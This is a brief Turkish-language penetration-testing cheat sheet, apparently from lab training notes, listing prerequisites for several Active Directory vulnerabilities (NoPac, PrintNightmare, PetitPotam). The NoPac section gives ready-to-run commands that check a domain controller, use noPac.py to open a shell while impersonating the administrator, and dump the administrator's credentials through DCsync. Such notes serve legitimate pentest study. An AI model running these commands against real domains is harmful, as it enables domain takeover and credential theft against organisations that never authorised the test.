Bleeding Edge Vulns

NoPac (CVE-2021-42278 ve CVE-2021-42287)

  • DC üzerinde antivirüs var ise çalışmaz

  • Kasım 2021 güncellemesi almayan DC üzerinde çalışır

  • Domain kullanıcısı gerekir

# NXC Kontrol
nxc smb 172.16.5.5 -u 'john' -p 'pass123' -M nopac

# Kontrol
python scanner.py example.local/john:pass123-dc-ip 172.16.5.5 -use-ldap

# Shell
python noPac.py example.local/john:pass123 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 -shell --impersonate administrator -use-ldap

# DCsync
python noPac.py example.local/john:pass123 -dc-ip 172.16.5.5  -dc-host ACADEMY-EA-DC01 --impersonate administrator -use-ldap -dump -just-dc-user example/administrator

PrintNightmare (CVE-2021-34527 ve CVE-2021-1675)

  • Temmuz 2021 öncesi windows sürümlerinde görülür.

  • Printspooler servisi açık olmalı.

  • Domain kullanıcısı gerekir

PetitPotam (CVE-2021-36942)

  • Ağustos 2021

  • Domain kullanıcısı gerekmez

NTLM Reflection

Last updated